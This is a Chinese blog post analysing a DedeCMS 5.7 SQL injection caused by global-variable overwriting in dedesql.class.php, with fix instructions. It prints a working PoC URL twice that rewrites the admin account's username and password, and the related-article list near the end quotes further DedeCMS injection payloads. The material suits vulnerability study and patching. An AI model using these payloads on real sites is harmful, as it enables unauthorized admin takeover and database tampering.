dedecms注入漏洞 search.php,Dedecms最新注入漏洞分析及修复方法

最新推荐文章于 2022-09-06 17:46:14 发布
最新推荐文章于 2022-09-06 17:46:14 发布
阅读量531 收藏
点赞数

DedeCMS SQL注入 漏洞分析 全局变量 PHP配置
关键词由CSDN通过智能技术生成

最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现。原因是此漏洞的利用需要一定的前提条件,而原分析文章当中并没有交代这些,所以这里将我的分析过程以及一些触发的必要条件总结了一下。

一. 漏洞跟踪

发布时间:2013年6月7日

漏洞描述:

DedeCMS是一个网站应用系统构建平台,也是一个强大的网站内容管理系统。基于PHP+MySQL的技术架构,完全开源加上强大稳定的技术架构,既可以用来构建复杂体系的企业信息门户或电子商务网站平台,也可以用来管理简单内容发布网站,不管是商务资源门户还是娱乐信息门户,它都是您管理网站的好帮手。

漏洞触发的根源在于dedesql.class.php在调用$GLOBALS[‘arrs1’]、$GLOBALS[‘arrs1’]这两个全局变量之前未对其进行初始化,导致能够覆盖任意全局变量。

漏洞危害:因为dedecms的使用非常广泛,而此漏洞利用方便,危害性高,能够远程获取管理后台,进而直接getshell获取系统控制权。

触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll,

如图所示:

1f55fcfe80164159222b79c95a7adea6.png

受影响版本:dedecms 5.7

二. 漏洞原理

首先说一下dedecms不安全的参数处理机制,这里我们看一下/include/common.inc.php代码的第79行:

foreach(Array(‘_GET’,'_POST’,'_COOKIE’) as $_request)

{

foreach($$_request as $_k => $_v)

{

if($_k == ‘nvarname’) ${$_k} = $_v;

else ${$_k} = _RunMagicQuotes($_v);

}

}

万恶之源其实就在这里,基本上目前dede被发现的漏洞全都死在这里。我们可以看到,程序从GPC数组中取出名值对后,只是对$_v做了简单的addslashes处理,就直接赋给了${$_k},实现了类似全局变量覆盖的机制,设计的初衷是为了开发方便,但却存在着严重的安全问题。PHP在经历了这么多年的更新换代终于修补了register_globals问题,但是dede的这段代码使php付出的努力全部白费。

下面我们回归漏洞。

首先是/include/dedesql.class.php的第589-600行,

9078f84855add8bfd38d136be820d543.png

在执行这段代码之前,程序未初始化$arrs1和$arrs2这两个数组。结合前面提到的dede不安全的参数处理机制,利用这段代码我们可以覆盖任意全局变量。例如在这个漏洞中,我们可以控制$GLOBALS['cfg_dbprefix']的值。

然后,我们来看一下如何利用$GLOBALS['cfg_dbprefix']。

这里在/include/dedesql.class.php的第512行SetQuery函数中,代码如下

18c3c443828aa95232deb23c81cb6a7a.png

这里因为$GLOBALS['cfg_dbprefix']是可控的,进而$prefix也是可控的,所以在这儿就造成了SQL注入。

下面跟踪一下整个漏洞的触发过程,这是网上已经公开的PoC:

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

首先看这个if判断,意思是如果开启了mysqli扩展,则包含dedesqli.class.php。这里存在漏洞的代码在dedesql.class.php中,所以漏洞利用的前提条件是必须关闭mysqli扩展。

98fbc9151fcc0c72cd022c87e9ca3766.png

这里跟入dedesql.class.php代码,如图

2505dedfd46f08f178ebfa5c55a21d95.png

这里我们传入的arrs1、arrs2两个数组因为还没有被初始化,所以这里$v1、$v2拼接为字符串,如图所示

2013061115302622.jpg

所以执行到这里$GLOBALS['cfg_dbprefix']被覆盖为

admin` SET `userid`=’test’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #

继续跟踪代码执行,

50ca8027ba00794a391eddbd13381482.png

跟入ExecuteNoneQuery2函数,一直跟进SetQuery,如图

f018e48b60159dd1ca820ce71eaeea16.png

这里因为$GLOBALS['cfg_dbprefix']是我们可控的,所以就造成了注入,这里看一下$sql的值,如图所示

fa4179602451f5d0b7f9bc2f54fb6271.png

因为ExecuteNoneQuery2函数没有使用mysql-ids进行过滤,所以这里借助它来注入。执行update成功之后,后台账户为test,密码为admin。

三. 漏洞验证

PoC:

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

验证截图:

4f5cb3a536c6da5d230822dac0f71a70.png

四. 漏洞修复

0×01、修改php.ini,确保开启php_mysqli.dll扩展。

0×02、修改/include/dedesql.class.php中的代码,如下所示

require_once(DEDEINC.’/common.func.php’);

//引入数据库类

if ($GLOBALS['cfg_mysql_type'] == ‘mysqli’ && function_exists(“mysqli_init”))

{

//echo $GLOBALS['cfg_mysql_type'];

//exit;

require_once(DEDEINC.’/dedesqli.class.php’);

} else {

require_once(DEDEINC.’/dedesql.class.php’);

}

//require_once(DEDEINC.’/common.func.php’);

茶啊冲的小男孩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞
weixin_42104947的博客
03-10 491
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.Hackme论坛原创 转载请附带原文链接作者: c4rp3nt3r@0x50sec.orgDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.算了不公开了,不能糟蹋0day了.传送门 DedeCmS V57 p...
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3823
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
dedecms注入
____
07-04 522
dedecms这一套程序太火爆了,但是他的sql都是直接拼接的,经常被注入。 GET //plus/erraddsave.php?dopost=saveedit&a=b&arrs 1[]=99&c=d&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=1
dedecms最新注入漏洞
cnbird's blog
08-28 1534
作者:张恒# Gh0u1:我没测试,先保留一下,晚上再说。dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究.利用此漏洞进行违法活动者,后果自负.假设域名是:www.abc.com攻击步骤如下:1. 访问网址:http://www.abc.com/plus/digg_frame.php?action=good&id=1024%
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
wLHK-Dedecms漏洞整理.pdf
09-20
wLHK-Dedecms漏洞整理 从给定的文件信息中,...Dedecms漏洞整理报告中包含了多个漏洞,包括SQL注入漏洞、XSS漏洞等,这些漏洞可能会导致数据库中的数据泄露或修改,因此需要及时修复这些漏洞,以确保数据的安全性。
基于PHP的泊学网dedecms整站源码.zip
08-26
【标题】"基于PHP的泊学网dedecms整站源码.zip" 是一个包含用于构建网站的完整源代码的压缩文件。这个源码是基于PHP编程语言开发的,并使用了知名的CMS(内容管理系统)——Dedecms(织梦内容管理系统)。Dedecms是...
PHP实例开发源码—泊学网dedecms整站源码.zip
11-23
5. **安全防护**:了解如何防止SQL注入、XSS攻击等常见的Web安全问题,Dedecms源码中会包含一些安全相关的处理,比如参数过滤、SQL预处理等。 6. **SEO优化**:Dedecms提供了友好的URL重写功能,帮助提高搜索引擎的...
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
07-25
"v5.7"表示这是DEDECMS的一个特定版本,通常每个版本会包含一些功能改进、错误修复和安全性更新。 【标签】"PHP"表明这个项目是使用PHP语言开发的。PHP是一种广泛使用的服务器端脚本语言,尤其适合于Web开发,可以...
dedecms注入漏洞feedback.php,织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
weixin_39912580的博客
03-31 277
影响版本:DEDECMS 5.1漏洞描述:同样是在magic_quotes_gpc=off的情况下可用此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl......$urlindex = 0;if(empty($arcID)){$row = $dlist->dsql->GetOne("Select id From...
dedecms+5.7+is+php,Dedecms v5.7 最新注入分析
weixin_28871821的博客
03-27 219
完整的输入语句,第二个参数 typeid可控。1INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('108','2','游客','paxmac','127.0.0.1','1'...
dedecms注入漏洞
aomi6689的博客
12-05 2881
版本:Powered byDedeCMSV57_GBK© 2004-2011DesDevInc. 漏洞利用EXP:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,...
dedecms织梦留言板edit.inc.php注入漏洞修复
09-06 241
dedecms注入漏洞,路径:/plus/guestbook/edit.inc.phpdedecms留言板edit.inc.php注入漏洞修复方法。打开edit.inc.php文件。在这两行中间加入一行以下代码。
织梦Dedecms的album_add.php文件SQL注入漏洞修复方法
qq_31763129的博客
04-26 3378
dedecms的/dedecms/member/album_add.php文件中,对输入参数mtypesid未进行int整型转义,导致SQL注入的发生。修复方法:打开dedecms/member/album_add.php文件,查找以下代码(大约220行左右)$description = HtmlReplace($description, -1);//2011.06.30 增加html过滤 (by...
DeDecms任意SQL语句执行漏洞
网站守护中心
04-13 1536
DeDecms任意SQL语句执行漏洞描述: 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞形成原因:由于dedecmsv5.6的全局机制可以任意给其赋值,而且高级搜索功能/plus/advancedsearch.php中的$sql变量未初始化,导致高级搜索功能可以绕过模板定义直接执行任意SQL语句。 DeDecms
dedecms会员中心mtypes.php注入漏洞修复方法
kakashs
01-15 1050
路径:/member/mtypes.php编辑mtypes.php,找到如下代码: elseif ($dopost == 'save') { if(isset($mtypeidarr) && is_array($mtypeidarr)) { $delids = '0'; $mtypeidarr = array_filter($mtyp...
织梦dedecms search.php注入漏洞exp,织梦DEDECMS search.php注入漏洞EXP[通杀]
weixin_34614550的博客
03-10 147
--------------------------------提交xx.com/plus/search.php?keyword=as&typeArr[uNion]=a--------------------如结果为:SafeAlert:RequestErrorstep2!则exp:xx.com/plus/search.php?keyword=as&typeArr...
[分析]-DedeCMS全版本通杀SQL注入漏洞
Nixawk
05-04 5667
mysql> SELECT s.*,t.* FROM -> `dede_member_stow` AS s LEFT JOIN -> `dede_member_stowtype` AS t ON s.type=t.stowname -> WHERE s.aid='1' -> AND s.type='\\' or mid=@`\\'` /*!50000unio
dedecms v56 plus/search.php 注入漏洞
最新发布
09-22
dedecms v56 plus 是一个开源的内容管理系统,其中的 search.php 文件存在注入漏洞。 这个注入漏洞允许攻击者通过构造恶意的请求,在 search.php 页面中执行恶意的 SQL 代码。攻击者可以利用这个漏洞获取敏感的数据库信息或者对数据库进行更改或删除操作。 注入漏洞通常是由于未正确过滤用户输入导致的。在 search.php 文件中,用户的搜索输入没有经过充分的验证和过滤,直接作为 SQL 查询语句的一部分拼接,从而导致注入漏洞的产生。 为了修复这个漏洞,可以采取以下措施: 1. 对用户的输入进行严格的验证和过滤。可以使用输入验证函数或者正则表达式来限制用户输入的内容。 2. 使用预编译语句或者参数化查询。这样可以避免将用户输入直接拼接到 SQL 查询语句中,从而防止注入攻击。 3. 更新 dedecms v56 plus 至最新版本。开发者通常会在新版本中修复已知的安全漏洞,因此及时更新可以有效地解决注入漏洞的问题。 4. 对服务器进行安全配置。限制数据库用户的权限,仅允许其执行必要的操作,可以减轻注入攻击所造成的损害。 总结来说,dedecms v56 plus 中的 search.php 注入漏洞是由于对用户输入未进行充分验证和过滤所导致。修复漏洞需要对用户输入进行认真验证和过滤,并采取安全措施,如使用预编译语句或者参数化查询来构建 SQL 查询语句,以及及时更新系统版本和服务器安全配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值